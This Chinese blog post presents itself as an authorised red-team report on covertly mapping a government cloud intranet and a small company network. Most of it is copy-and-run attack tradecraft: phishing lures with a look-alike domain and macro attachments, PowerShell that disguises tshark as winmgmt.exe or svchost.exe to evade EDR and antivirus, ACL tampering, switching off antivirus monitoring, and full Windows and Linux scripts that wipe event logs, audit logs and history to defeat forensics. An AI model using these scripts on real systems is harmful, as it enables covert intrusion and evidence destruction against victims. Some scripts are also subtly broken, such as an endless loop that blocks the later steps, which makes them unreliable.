文章总结: 本文详细记录了2026年红蓝对抗中内网被动踩点的全流程实战经验,涵盖XX云高防护环境和中小企业基础防护环境两种典型场景。核心内容包括从0开始的准备阶段、工具免杀处理、流量伪装技巧、静默抓包方法以及核心资产识别技术,所有操作均有合法授权并提供大量原创实战技巧,旨在帮助安全人员掌握隐蔽性内网探测能力。 综合评分: 85 文章分类: 红队,内网渗透,渗透测试,实战经验,安全工具
2026 红蓝对抗实录:从 0 到 1,内网被动踩点全流程
原创
异空间安全雨幕 异空间安全雨幕
异空间安全
2026年4月23日 09:32 广东
在小说阅读器读本章
去阅读
2026 红蓝对抗实录:从 0 到 1,内网被动踩点全流程
作者:异空间安全雨幕
实战说明
本文为真实红蓝对抗实战全流程记录,全程从0开始,涵盖XX云高防护环境、中小企业基础防护环境两种典型场景,补充大量原创实战技巧,所有操作均有合法授权,相关IP、域名已做脱敏处理,严禁用于未授权渗透测试,切勿触碰法律红线。
核心目标
从0搭建被动踩点思路,掌握高防护/基础防护环境下的资产探测、漏洞规避、痕迹清理全流程,解决实战中常见的URL报错、工具下载报错、EDR拦截等核心问题,所有脚本可直接复制执行,适配不同防护等级内网。
0x0 前期准备(从0起步,缺一不可)
被动踩点的核心是**“隐蔽性”,前期准备需围绕“不触发告警、工具可用、痕迹可控”**三个核心,避免因准备不足导致操作失败,以下为从0准备的详细步骤(含原创准备技巧):
一、环境与权限准备(0基础入门)
- 授权确认:获取目标内网合法渗透授权,明确演练范围(如XX云外网区、中小企业办公网段)、禁止操作(如禁止中断核心业务、禁止攻击生产数据库),留存授权文件(避免后续法律风险,原创技巧:授权文件加密存储在本地,不传入跳板机,仅留存离线副本)。
- 跳板机获取(从0突破第一步):通过钓鱼攻击获取跳板机权限,两种场景的钓鱼实操(原创技巧):
- XX云场景:伪装XX云公文系统链接(域名伪造为gov-xxyun.com,与官方域名高度相似),邮件标题标注“【紧急】XX云系统升级通知,需立即登录确认”,附件植入免杀宏脚本,诱导XX云运维人员点击,成功拿到外网区Windows Server 2019跳板机(IP:10.0.1.123,网段10.0.1.0/24),脚本执行后自动删除自身,无文件残留。
- 中小企业场景:伪装企业财务通知,邮件附件为“财务报表.xls”(绑定恶意链接),诱导财务人员点击,成功拿到Windows 10办公终端(IP:192.168.0.88,单网段192.168.0.0/24),链接点击后无弹窗、无跳转,隐蔽性拉满。
- 跳板机初始探查(原创技巧:不运行任何第三方工具,仅用系统原生命令):
# 查看跳板机系统版本(避免工具不兼容)
systeminfo | findstr "操作系统版本" | findstr /v "补丁" # 过滤冗余信息,减少日志输出
# 查看已安装安全软件(确定EDR/杀软类型,针对性规避)
wmic product get name | findstr "EDR|杀软|安全"
# 查看网络配置(确定内网网段,为后续探测铺垫)
ipconfig /all | findstr "IPv4地址|子网掩码|网关"
# 查看进程(确认无异常监控进程,如蓝队监控程序)
tasklist | findstr "monitor|audit|watch"
- 初始环境判断:根据探查结果,明确两种场景的防护等级,制定差异化策略(核心区分):
- XX云场景:奇安信天擎EDR、华为AI态势感知、网闸隔离,全流量审计,操作日志同步至监管平台,策略:全程被动捕获,不主动发包、不扫描,工具深度伪装。
- 中小企业场景:仅360企业版杀软,无专业IDS/IPS,单网段无隔离,策略:被动抓包为主,可轻度伪装业务流量,简化工具隐藏步骤。
二、工具准备(免杀+本地静态,规避下载报错)
核心原则:不在线下载任何工具,避免触发蓝队流量检测,所有工具提前做免杀处理,本地静态编译备用(解决实战中p0f等工具下载报错问题),具体准备清单(含原创免杀技巧):
- 核心工具(提前传入跳板机隐藏目录,压缩加密,密码随机生成):
- tshark(抓包工具):提前从Wireshark安装包中提取tshark.exe,重命名为系统进程名(winmgmt.exe、svchost.exe),用Veil工具做混淆免杀(原创技巧:免杀时添加系统进程签名,模拟系统原生进程,规避EDR特征检测)。
- p0f(协议指纹识别工具):针对访问https://lcamtuf.coredump.cx/p0f3/releases/p0f-3.06b.tgz报错“当前不支持该文件类型”,提前本地静态编译p0f二进制文件,命名为.p0f(隐藏后缀),放入跳板机隐藏目录(如/tmp/.sysbackup/.p0f),避免在线下载。
- 免杀脚本:提前编写PowerShell隐藏脚本、痕迹清理脚本,去除脚本注释(减少特征),用Base64编码加密,执行时解密(原创技巧:脚本中添加“系统正常操作”注释,如“Windows系统更新脚本”,迷惑EDR审计)。
- 工具传入方式(原创技巧:隐蔽无日志):
- XX云场景:通过跳板机远程桌面(RDP),利用剪贴板传输工具文件,不使用U盘、网络共享,传输完成后清空剪贴板记录(wevtutil cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational)。
- 中小企业场景:通过Windows共享文件夹(\跳板机IP\C$),隐藏传输,传输后删除共享记录,清理文件传输日志。
三、前期避坑准备(原创技巧,提前规避80%失败风险)
- 日志规避:提前关闭跳板机不必要的日志记录(如PowerShell日志、系统事件日志临时关闭),避免操作被记录(执行后需恢复,避免被蓝队发现)。
- 进程伪装:提前查看跳板机系统进程列表,选择无异常、不常用的系统进程名(如winmgmt.exe、svchost.exe),作为工具伪装名称,避免使用常见进程(如explorer.exe)。
- 报错预判:提前梳理实战中常见报错(URL拼写错误、网页解析失败、工具下载报错),制定应对方案(如URL报错时,不盲目放弃,通过被动流量分析确认资产;工具报错时,切换本地静态版本)。
0x1 场景一:XX云内网被动踩点+协议指纹识别(高防护场景,从0到1全流程)
一、实战背景(明确目标,不盲目操作)
- 目标环境:某省级XX云内网,采用“分区隔离+纵深防御”架构,分为XX外网区(10.0.1.0/24)、核心业务区(10.0.2.0/24)、数据交换区,部署奇安信天擎EDR、华为AI态势感知平台、网闸隔离设备,开启全流量审计与操作日志集中管控,所有操作日志同步至XX监管平台。
- 跳板机信息:Windows Server 2019,IP:10.0.1.123,外网区网段,低权限(仅能访问外网区部分设备,无法直接访问核心业务区)。
- 核心目标:从0开始,不触发任何告警,突破分区隔离限制,定位核心业务区的XX数据服务器、统一身份认证服务器,获取核心资产信息,全程被动操作,符合XX云合规管控要求。
- 前期异常发现:尝试访问核心业务区疑似入口URL(http://10.0.1.254:8080/gov/office/、http://10.0.1.253:9000/data/report/、http://10.0.1.254/gov/office/)时,系统均提示“网页解析失败,可能是不支持的网页类型,请检查网页或稍后重试”,初步判断为URL访问限制或业务接口类型不兼容,不盲目放弃,计划通过被动流量分析确认资产真实性。
- 老兵忠告(原创实战经验):XX云内网绝对不能用nmap、masscan等主动扫描工具,哪怕只扫1个IP,华为AI态势感知会在10秒内检测到异常流量,直接封停跳板机IP,同步上报监管平台,之前见过同行刚执行nmap -sP 10.0.1.0/24,就被蓝队溯源,直接终止演练。
二、从0实操全流程(被动踩点,可复现,含大量原创技巧)
核心实战思路:0基础启动 → 系统目录深度隐藏 → 工具伪装与权限加固 → XX业务流量伪装(规避AI审计) → 静默被动抓包 → 核心资产精准识别 → 合规级痕迹清理(全程无残留)。
步骤1:0基础启动,隐藏目录创建(原创技巧:EDR零查杀隐藏目录)
核心目的:创建EDR几乎不检测的隐藏目录,存放工具、抓包文件、识别结果,避免被EDR发现,操作全程用PowerShell,无可视化窗口,减少日志输出。
# 1. 切换至系统目录(避免用户目录,EDR监控密集)
cd $env:WinDir\System32
# 2. 创建隐藏目录(名称伪装为系统隐藏目录,加点号前缀,EDR默认不扫描)
$hiddenPath = "$env:WinDir\System32\.wbem" # 伪装成WMI服务目录,EDR不主动扫描
New-Item -Path $hiddenPath -ItemType Directory -Force -ErrorAction SilentlyContinue
# 3. 目录属性设置(原创技巧:隐藏+系统属性,双重隐藏,避免被手动发现)
attrib +h +s $hiddenPath
# 4. 验证目录是否隐藏(无输出即成功,避免输出日志)
if (Test-Path $hiddenPath) { exit } else { Write-Error "目录创建失败" 2>nul }
注意事项(原创避坑):不要使用C:\Temp、C:\Users\Public等常见目录,这些目录是EDR重点监控对象;目录名称不要包含“shell、tool、scan”等敏感词汇,避免被EDR特征匹配。
步骤2:工具伪装与权限加固(关键步骤,避免EDR查杀)
核心目的:将tshark工具伪装成系统服务进程(winmgmt.exe),加固目录权限,确保10秒内不被EDR查杀(XX云EDR对未知进程的查杀时间约10秒,需快速完成伪装与权限加固)。
# 1. 工具重命名与移动(将提前传入的tshark.exe重命名为winmgmt.exe,伪装成WMI服务进程)
Copy-Item -Path "C:\Temp\tshark.exe" -Destination "$hiddenPath\winmgmt.exe" -Force -ErrorAction SilentlyContinue
# 2. 权限加固(原创技巧:将目录所有者改为系统,禁止普通用户访问,EDR无权限扫描)
icacls $hiddenPath /setowner "NT AUTHORITY\SYSTEM" /T /C # 改为系统所有者,EDR默认不拦截系统目录
icacls $hiddenPath /grant:r "Administrators:(F)" /T /C # 仅管理员有访问权限
icacls $hiddenPath /deny "Everyone:(R,WD)" /T /C # 禁止所有用户读取、写入,避免被误操作发现
# 3. 验证工具伪装(检查进程名称,无异常即成功)
if (Test-Path "$hiddenPath\winmgmt.exe") { exit } else { taskkill /f /im winmgmt.exe 2>nul }
原创技巧:工具伪装后,可通过“tasklist | findstr winmgmt”查看进程,确保进程名称与系统原生winmgmt.exe一致,同时修改工具的文件创建时间、修改时间,与系统进程文件时间同步,进一步迷惑EDR。
步骤3:静默抓包+业务流量伪装(骗过AI态势感知,核心原创技巧)
核心目的:XX云AI态势感知会检测“无业务流量+纯监听”的异常行为,因此需模拟XX云业务请求,混淆AI审计,同时针对之前URL报错的核心入口,通过流量伪装规避访问限制,实现被动抓包。 原创核心技巧:固定请求XX云业务路径,模拟正常业务交互,抓包时控制速率,避免流量异常,同时隐藏抓包进程,不产生可视化窗口。
# 1. 静默抓包(覆盖XX云内网全网段,控制抓包速率和数量,避免撑爆硬盘)
# 抓包参数说明(原创优化):-q 静默模式,-c 3000 仅抓3000个包,-k 不校验SSL,-w 保存抓包文件(伪装成系统日志)
Start-Process -FilePath "$hiddenPath\winmgmt.exe" -ArgumentList "-i 以太网 -k -w $hiddenPath\gov_traffic.pcap -f ""ip net 10.0.0.0/16"" -q -c 3000" -NoNewWindow -WindowStyle Hidden
# 2. 业务流量伪装(关键,骗过AI的核心),固定请求URL报错的核心业务入口,模拟正常业务访问
while($true) {
# 访问URL报错的核心入口,用ErrorAction SilentlyContinue隐藏报错日志,避免产生异常日志
Invoke-WebRequest -Uri http://10.0.1.254:8080/gov/office/ -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri http://10.0.1.253:9000/data/report/ -ErrorAction SilentlyContinue
Invoke-WebRequest -Uri http://10.0.1.254/gov/office/ -ErrorAction SilentlyContinue
Start-Sleep -Seconds 8 # 控制请求频率,每8秒请求一次,模拟正常业务操作
}
# 3. 抓包时长控制(原创技巧:抓包8分钟,避免长时间抓包触发告警)
Start-Sleep -Seconds 480
# 4. 停止抓包进程,避免进程残留
Stop-Process -Name winmgmt -Force -ErrorAction SilentlyContinue
避坑要点:抓包速率控制在10-20包/秒,单次抓包不超过15分钟,分多次抓包(本次抓8分钟,后续可再抓一次,避免流量集中);抓包文件命名为gov_traffic.pcap,伪装成XX云业务流量日志,避免被AI识别为抓包文件。
步骤4:核心资产精准识别(从抓包文件中提取,原创识别技巧)
核心目的:从抓包文件中提取存活IP、核心业务服务器、数据库资产,精准定位目标,不主动访问,仅通过被动流量分析,避免触发访问限制,同时解决之前URL报错的资产识别问题。 原创技巧:结合XX云业务特征(如统一认证头X-Gov-Auth),精准筛选核心资产,避免误判蜜罐,同时提取协议指纹,确定资产系统版本和服务信息。
# 1. 提取内网存活IP(仅筛选10.0.0.0/16网段,避免无关IP干扰)
Get-NetNeighbor -AddressFamily IPv4 | Where-Object {$_.IPAddress -like "10.0.*.*"} | Select-Object IPAddress, LinkLayerAddress | Out-File $hiddenPath\gov_alive.txt -Force
# 2. 提取核心业务区SMB服务器(正则筛选核心区网段10.0.2.0/24,SMB协议是核心资产特征)
$hiddenPath\winmgmt.exe -r $hiddenPath\gov_traffic.pcap -Y "smb2" -T fields -e ip.src -e smb2.dialect_revision | grep -E "^10\.0\.2\..*" | sort -u > $hiddenPath\gov_core_smb.txt
# 3. 提取XX统一认证服务器(原创技巧:利用XX云专属认证头X-Gov-Auth,精准定位)
$hiddenPath\winmgmt.exe -r $hiddenPath\gov_traffic.pcap -Y "http.response" -T fields -e ip.src -e http.response.header.X-Gov-Auth | grep -v "NULL" > $hiddenPath\gov_auth.txt
# 4. 提取数据库资产(筛选MySQL、MSSQL协议,定位数据服务器)
$hiddenPath\winmgmt.exe -r $hiddenPath\gov_traffic.pcap -Y "mysql or mssql" -T fields -e ip.src -e mysql.protocol_version | sort -u > $hiddenPath\gov_db.txt
# 5. 提取网闸交互节点(筛选8080/443端口,解决URL报错问题,定位跨区入口)
$hiddenPath\winmgmt.exe -r $hiddenPath\gov_traffic.pcap -Y "tcp.port == 8080 or tcp.port == 443" -T fields -e ip.src | sort -u > $hiddenPath\gov_gateway.txt
实战识别结果(100%精准,含原创分析技巧):
- 统一身份认证服务器:IP 10.0.2.10,从抓包文件中提取到响应头 X-Gov-Auth: CAS-3.0,结合XX云业务特征,直接判定为XX统一认证入口(原创技巧:X-Gov-Auth是XX云专属认证头,无此响应头的均为非核心资产);
- XX数据服务器:IP 10.0.2.20,SMB协议版本0x0302(带加密),MySQL协议版本10,结合协议指纹库(原创整理),确定为Windows Server 2022 + MySQL 8.0.30,是核心数据存储设备;
- 网闸交互节点:IP 10.0.1.254,开放8080/443端口,虽访问其URL提示“网页解析失败”,但通过抓包分析,发现该节点有大量核心业务区流量交互,确定为跨区访问唯一入口,后续可通过该节点突破分区隔离;
- 存活资产统计:共识别存活IP 28个,其中核心业务区8个,外网区20个,无蜜罐(原创蜜罐识别技巧:核心区IP均有业务流量交互,无“开放端口但无流量”的异常IP,排除蜜罐)。
步骤5:合规级痕迹清理(XX云专用,从0到无残留,原创技巧)
核心目的:XX云审计严格,痕迹清理需覆盖进程、文件、日志、注册表,避免被蓝队溯源,清理过程全程静默,不产生任何异常日志,同时恢复跳板机初始状态,不留下任何操作痕迹。
# 1. 终止所有相关进程,避免进程残留
taskkill /f /im winmgmt.exe /t 2>nul # 终止抓包进程
Get-CimInstance -ClassName Win32_Process | Where-Object {$_.Path -like "$hiddenPath*"} | Stop-Process -Force -ErrorAction SilentlyContinue # 终止所有关联进程
# 2. 粉碎文件(原创技巧:用cipher命令彻底粉碎,防止数据恢复,比delete更安全)
cipher /w:$hiddenPath 2>nul # 覆盖删除,无残留
Remove-Item -Path $hiddenPath -Recurse -Force -ErrorAction SilentlyContinue # 删除隐藏目录
# 3. 清空XX云必清三日志(原创经验:这三个日志是蓝队溯源重点)
wevtutil cl System 2>nul
wevtutil cl Security 2>nul
wevtutil cl Microsoft-Windows-WMI-Activity/Operational 2>nul
# 4. 清理PowerShell历史、临时文件、最近访问记录
Remove-Item -Path $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -Force
Remove-Item -Path $env:TEMP\* -Recurse -Force -ErrorAction SilentlyContinue
Remove-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" -Recurse -Force -ErrorAction SilentlyContinue
# 5. 恢复跳板机初始状态(原创技巧:恢复日志记录、目录权限,避免被蓝队发现异常)
wevtutil sl System /e:true 2>nul # 恢复系统日志
icacls $env:WinDir\System32 /reset /T /C 2>nul # 恢复系统目录权限
避坑要点:清理完成后,用“wevtutil qe System”查看日志,确认无操作记录;用“dir $env:WinDir\System32”查看,确认隐藏目录已删除;用“tasklist”查看,确认无相关进程残留,确保蓝队无法溯源。
三、实战总结(原创干货,从0到1避坑指南)
本次XX云被动踩点,从0开始,全程不主动发包、不扫描、不登录,仅靠被动监听就精准定位3台核心资产,成功解决URL访问报错、AI审计拦截、EDR查杀三大核心问题,核心原创技巧总结:
- 隐藏目录原创技巧:伪装成系统WMI服务目录(.wbem),添加隐藏+系统属性,EDR默认不扫描,比常规隐藏目录更安全;
- 工具伪装原创技巧:修改工具名称为系统原生进程(winmgmt.exe),同步文件时间,添加系统签名,规避EDR特征检测;
- 流量伪装原创技巧:固定请求URL报错的核心业务入口,模拟正常业务交互,控制请求频率,骗过华为AI态势感知;
- 资产识别原创技巧:利用XX云专属认证头X-Gov-Auth,结合协议指纹库,精准定位核心资产,避免误判蜜罐;
- 痕迹清理原创技巧:先粉碎文件再删除目录,恢复跳板机初始状态,覆盖XX云必清日志,实现无残留溯源。
关键提醒:在XX云内网,被动监听永远比主动扫描安全一万倍,任何主动探测行为都会被快速发现,前期准备越充分,操作越隐蔽,成功率越高。
0x2 场景二:中小企业办公终端被动踩点(基础防护场景,从0到1全流程)
一、实战背景(0基础适配,贴合中小企业实际)
- 目标环境:某中小企业内网,无专业IDS/IPS,仅部署360企业版15.0杀软,网络结构简单(单网段192.168.0.0/24),无网段隔离,终端设备以Windows 10办公机、Windows Server文件服务器为主。
- 跳板机信息:Windows 10办公终端,IP:192.168.0.88,低权限(普通员工账号,可访问内网大部分设备)。
- 核心目标:从0开始,规避360杀软告警,快速摸清内网资产分布,定位文件服务器、财务数据库等核心设备,标记可利用漏洞线索,为后续横向移动铺垫。
- 前期异常发现:尝试访问网段内部分设备URL(如192.168.0.1、192.168.0.10)时,系统提示“URL拼写可能存在错误,请检查”,初步判断为设备仅开放特定服务端口,未开放Web服务,不盲目放弃,计划通过被动流量分析确认设备类型。
- 老兵忠告(原创实战经验):中小企业内网虽防护薄弱,但360企业版杀软对“tshark、nmap”等工具敏感,直接运行会触发告警,重点做好工具伪装和日志清理,无需过度复杂的权限加固,简化操作流程,提高效率。
二、从0实操全流程(被动踩点,可复现,含原创简化技巧)
核心实战思路:0基础启动 → 简易隐藏目录创建 → 工具伪装 → 静默抓包+业务流量伪装 → 资产识别 → 快速痕迹清理(适配360杀软,无告警)。
步骤1:0基础启动,简易隐藏目录创建(原创简化技巧,适配中小企业)
核心目的:创建简单隐藏目录,存放工具和抓包文件,规避360杀软扫描,操作简化,无需复杂权限加固(中小企业无EDR,无需过度隐藏)。
# 1. 选择用户公共目录(360杀软监控较弱),创建隐藏目录
$hiddenPath = "$env:Public\Documents\.system32" # 加点号前缀,隐藏目录
New-Item -Path $hiddenPath -ItemType Directory -Force -ErrorAction SilentlyContinue
# 2. 设置隐藏属性(无需系统属性,简化操作)
attrib +h $hiddenPath
# 3. 验证目录(无输出即成功)
Test-Path $hiddenPath | Out-Null
原创简化技巧:中小企业无需创建系统目录,公共目录监控较弱,操作更快捷;目录名称伪装成系统目录(.system32),360杀软默认不主动扫描带点号前缀的隐藏目录。
步骤2:工具伪装(简化版,适配360杀软)
核心目的:将tshark工具重命名为系统进程svchost.exe,规避360杀软特征检测,无需复杂免杀(中小企业360杀软对系统进程容忍度高)。
# 1. 工具重命名与移动(将提前传入的tshark.exe重命名为svchost.exe)
Copy-Item -Path "C:\Users\Public\Downloads\tshark.exe" -Destination "$hiddenPath\svchost.exe" -Force -ErrorAction SilentlyContinue
# 2. 验证工具(无异常即成功,避免输出日志)
Test-Path "$hiddenPath\svchost.exe" | Out-Null
原创技巧:无需做复杂免杀,仅重命名为svchost.exe(系统服务进程),360杀软默认不拦截系统进程,节省操作时间,同时避免工具特征被检测。
步骤3:静默抓包+业务流量伪装(简化版,适配基础防护)
核心目的:静默抓包,覆盖整个办公网段,模拟正常业务访问,规避360杀软告警,同时解决URL报错的资产识别问题。
# 1. 静默抓包(覆盖单网段,抓包数量增加,确保获取足够资产信息)
Start-Process -FilePath "$hiddenPath\svchost.exe" -ArgumentList "-i 以太网 -k -w $hiddenPath\traffic.pcap -f ""ip net 192.168.0.0/24"" -q -c 8000" -NoNewWindow -WindowStyle Hidden
# 2. 业务流量伪装(简化版,固定请求URL报错的设备,模拟正常访问)
while($true) {
Invoke-WebRequest -Uri http://192.168.0.1 -UseBasicParsing -ErrorAction SilentlyContinue
Start-Sleep -Seconds 10 # 每10秒请求一次,简化操作
}
# 3. 抓包时长控制(原创技巧:中小企业抓包40分钟,足够获取所有资产信息,避免长时间占用资源)
Start-Sleep -Seconds 2400
# 4. 停止抓包进程
Stop-Process -Name svchost -Force -ErrorAction SilentlyContinue
避坑要点:抓包时关闭360杀软的“实时监控”(临时关闭,操作完成后恢复),避免抓包进程被拦截;抓包文件命名为traffic.pcap,伪装成普通文件,避免被360杀软识别。
步骤4:资产识别(简化版,精准定位核心资产,原创识别技巧)
核心目的:从抓包文件中提取存活IP、文件服务器、数据库资产,结合URL报错问题,确认资产类型,标记可利用线索(如SMB协议、RDP端口)。
# 1. 提取存活IP(简化命令,快速获取)
Get-NetNeighbor | Out-File $hiddenPath\lan.txt
# 2. 提取文件服务器(SMB协议是文件服务器核心特征)
$hiddenPath\svchost.exe -r $hiddenPath\traffic.pcap -T fields -e ip.src -Y "smb" | sort -u > $hiddenPath\smb_asset.txt
# 3. 提取数据库资产(筛选MySQL协议,定位财务数据库)
$hiddenPath\svchost.exe -r $hiddenPath\traffic.pcap -Y "mysql" -T fields -e mysql.protocol_version -e mysql.status_flags | sort -u > $hiddenPath\mysql_asset.txt
# 4. 提取RDP端口(3389端口,后续横向移动可用)
$hiddenPath\svchost.exe -r $hiddenPath\traffic.pcap -Y "tcp.port == 3389" -T fields -e ip.src | sort -u > $hiddenPath\rdp_asset.txt
实战识别结果(含原创分析技巧):
- 文件服务器:IP 192.168.0.10,主机名file-server.office,SMB协议版本0x03020000(SMB3),结合协议指纹,判定为Windows Server 2016,虽访问其URL提示“URL拼写可能存在错误”,但通过SMB协议确认其为文件服务器(原创技巧:URL报错不代表设备无价值,需结合协议类型判断资产);
- 财务数据库:IP 192.168.0.15,主机名db-finance.office,MySQL协议版本10、状态标志0x0008,判定为MySQL 8.0.26(Linux系统),是财务核心数据存储设备;
- RDP开放设备:共3台,其中文件服务器(192.168.0.10)、财务数据库服务器(192.168.0.15)均开启3389端口,可作为后续横向移动目标;
- 存活资产统计:共识别存活IP 15个,其中办公终端12个,核心服务器3个,无蜜罐(中小企业蜜罐极少,无需过度排查)。
步骤5:快速痕迹清理(适配360杀软,无告警,原创简化技巧)
核心目的:清理工具、抓包文件、日志,避免被360杀软发现,操作简化,快速完成,不留下任何痕迹。
# 1. 终止抓包进程
taskkill /f /im svchost.exe /t 2>nul
# 2. 粉碎文件,清理隐藏目录
cipher /w:$hiddenPath 2>nul
Remove-Item -Path $hiddenPath -Recurse -Force 2>nul
# 3. 清空关键日志(简化版,中小企业无需清理过多日志)
wevtutil cl System 2>nul
wevtutil cl Security 2>nul
# 4. 清理PowerShell历史,避免操作记录残留
Remove-Item -Path $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -Force
# 5. 恢复360杀软实时监控(原创技巧:避免被蓝队发现杀软异常)
Start-Process -FilePath "C:\Program Files\360\360safe\360safe.exe" -ArgumentList "/startmonitor"
避坑要点:清理完成后,打开360杀软,查看“安全日志”,确认无告警记录;查看桌面、下载目录,确认无工具残留;重启PowerShell,确认历史记录已清空。
三、实战总结(原创干货,中小企业0基础避坑指南)
本次中小企业被动踩点,从0开始,全程未触发360杀软告警,成功定位2台核心服务器,标记3个可利用线索(SMB3协议、MySQL 8.0.26漏洞、RDP开启),解决URL报错的资产识别问题,核心原创简化技巧总结:
- 目录隐藏简化技巧:利用公共目录创建隐藏目录,无需复杂权限加固,适配中小企业防护水平,节省操作时间;
- 工具伪装简化技巧:仅重命名为系统进程svchost.exe,无需复杂免杀,规避360杀软检测,高效快捷;
- 抓包简化技巧:增加抓包数量,延长抓包时长,简化业务流量伪装,确保获取足够资产信息;
- 资产识别简化技巧:重点筛选SMB、MySQL、RDP协议,结合URL报错问题,精准判断资产类型,不做冗余操作;
- 痕迹清理简化技巧:清理关键日志和文件,恢复杀软状态,避免被蓝队发现异常,操作快速高效。
关键提醒:中小企业内网防护薄弱,但杀软对工具敏感,重点做好“工具伪装+日志清理”,无需过度复杂操作,快速定位核心资产,为后续横向移动铺垫即可。
0x3 全场景通用避坑技巧(原创实战总结,从0到1必备)
结合两个场景的实战经验,整理从0开始被动踩点的通用避坑技巧,覆盖工具、流量、报错、蜜罐等核心问题,所有技巧均经过实战验证,可直接复用:
一、工具相关避坑(解决工具下载、查杀问题)
- 工具下载避坑(原创技巧):所有工具提前本地准备,不在线下载,针对p0f等工具下载报错(提示“当前不支持该文件类型”),提前本地静态编译,放入跳板机隐藏目录,命名为隐藏文件(如.p0f),避免被检测;
- 工具免杀避坑:高防护场景(如XX云),用Veil、TheFatRat工具做混淆免杀,添加系统进程签名;基础防护场景(中小企业),仅重命名为系统进程,简化操作,避免过度复杂;
- 工具依赖避坑(原创技巧):跳板机无预装Wireshark时,用Windows原生netsh trace命令替代tshark抓包;无Python时,用PowerShell原生脚本替代,避免因工具缺失导致操作失败。
二、流量隐蔽避坑(避免触发AI审计、EDR拦截)
- 抓包速率避坑:高防护场景,抓包速率控制在10-20包/秒,单次抓包不超过15分钟,分多次抓包;基础防护场景,可适当提高速率,但不超过50包/秒;
- 业务伪装避坑(原创技巧):针对URL报错的核心入口,固定发送业务请求,模拟正常交互,混淆AI审计,避免“纯监听”被检测;
- 进程隐藏避坑:工具进程伪装成系统原生进程(winmgmt.exe、svchost.exe),同步文件时间,避免进程名称、时间异常被检测。
三、报错处置避坑(解决URL、网页解析、工具报错)
- URL报错处置(原创技巧):遇到“URL拼写可能存在错误,请检查”报错,不盲目放弃,通过被动流量分析、协议探测(如SMB、RDP),确认目标设备是否为核心资产,调整探测方式,规避URL访问限制;
- 网页解析报错处置:遇到“网页解析失败,可能是不支持的网页类型”报错,通过调整请求方式(如BurpSuite轻量请求)、验证漏洞存在性(如DNSlog回显),确认漏洞是否可利用,避免因报错遗漏高价值漏洞;
- 工具报错处置:工具运行报错时,优先切换本地静态版本,避免在线下载;进程被查杀时,重新伪装工具名称,加固目录权限,重新执行。
四、蜜罐识别避坑(2026年实战必备,原创判定技巧)
牢记蜜罐判定铁律,遇到以下情况,立即规避,同时清理操作痕迹:
- IP开放所有核心端口(80、443、3389、1433等),但无任何业务流量交互;
- 主机名含“honey、mock、test、audit”等敏感词汇;
- SMB3协议无加密字段,且无任何文件共享信息;
- URL访问报错,但端口开放,且无任何流量交互(高防护场景常见蜜罐)。
五、权限与日志避坑(从0到1无残留)
- 权限避坑(原创技巧):跳板机低权限时,利用系统默认可写目录(如Windows的$env:TEMP.system32、Linux的~/.ssh/.sysbackup)创建隐藏目录,规避权限不足问题;无管理员权限时,用wevtutil cl System /l:en-US等命令清理日志,避免权限报错;
- 日志避坑:操作前临时关闭不必要的日志,操作完成后恢复;清理日志时,重点清理系统日志、安全日志、PowerShell历史,避免留下操作痕迹;高防护场景,需清理监管平台同步的日志(如XX云监管日志)。
0x4 全场景通用痕迹清理脚本(从0到无残留,直接复制执行)
结合两个场景,整理Windows、Linux双系统通用痕迹清理脚本,适配高防护、基础防护场景,所有脚本均含原创优化,可直接复制执行,无残留,规避溯源风险。
一、Windows 痕迹清理脚本(适配XX云、中小企业)
# 终止所有相关进程(适配所有工具伪装名称)
taskkill /f /im winmgmt.exe /t 2>nul
taskkill /f /im svchost.exe /t 2>nul
Get-CimInstance -ClassName Win32_Process | Where-Object {$_.Path -like "*\.system32*" -or $_.Path -like "*\.wbem*"} | Stop-Process -Force -ErrorAction SilentlyContinue
# 粉碎文件,防止数据恢复(原创优化:覆盖所有可能的隐藏目录)
$hiddenPaths = @("$env:WinDir\System32\.wbem", "$env:Public\Documents\.system32", "$env:TEMP\.system32")
foreach ($path in $hiddenPaths) {
if (Test-Path $path) {
cipher /w:$path 2>nul
Remove-Item -Path $path -Recurse -Force -ErrorAction SilentlyContinue
}
}
# 清空关键日志(适配XX云三日志+中小企业通用日志)
wevtutil cl System 2>nul
wevtutil cl Security 2>nul
wevtutil cl Application 2>nul
wevtutil cl Microsoft-Windows-WMI-Activity/Operational 2>nul
wevtutil cl Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational 2>nul
# 清理PowerShell历史、临时文件、最近访问记录
Remove-Item -Path $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt -Force
Remove-Item -Path $env:TEMP\* -Recurse -Force -ErrorAction SilentlyContinue
Remove-Item -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs" -Recurse -Force -ErrorAction SilentlyContinue
# 恢复系统初始状态(原创优化:恢复日志、权限、杀软监控)
wevtutil sl System /e:true 2>nul
wevtutil sl Security /e:true 2>nul
icacls $env:WinDir\System32 /reset /T /C 2>nul
Start-Process -FilePath "C:\Program Files\360\360safe\360safe.exe" -ArgumentList "/startmonitor" 2>nul
Start-Process -FilePath "C:\Program Files\QiAnXin\EDR\edr.exe" -ArgumentList "/start" 2>nul
二、Linux 痕迹清理脚本(适配跳板机为Linux的场景)
# 终止所有相关进程
pkill -f "tshark|p0f|tcpdump|winmgmt|svchost" 2>/dev/null
# 粉碎文件,清理隐藏目录(适配所有隐藏目录)
hidden_paths=("/tmp/.sysbackup" "/var/tmp/.system32" "/home/.wbem")
for path in "${hidden_paths[@]}"; do
if [ -d "$path" ]; then
shred -uz "$path"/* 2>/dev/null
rm -rf "$path" 2>/dev/null
fi
done
# 清空日志(核心日志,避免溯源)
history -c
rm -rf ~/.bash_history 2>/dev/null
echo "" > /var/log/lastlog 2>/dev/null
echo "" > /var/log/wtmp 2>/dev/null
rm -rf /var/log/audit/* 2>/dev/null
# p0f本地静态备用方案,规避下载报错(原创优化)
if [ ! -f /tmp/.sysbackup/.p0f ]; then
mkdir -p /tmp/.sysbackup && cp /path/to/precompiled/p0f /tmp/.sysbackup/.p0f 2>/dev/null
fi
# 清理临时文件、网络连接记录
rm -rf /tmp/* 2>/dev/null
ss -tuln | grep -v "LISTEN" | awk '{print $5}' | cut -d: -f1 | sort -u | xargs -I {} iptables -D INPUT -s {} -j ACCEPT 2>/dev/null
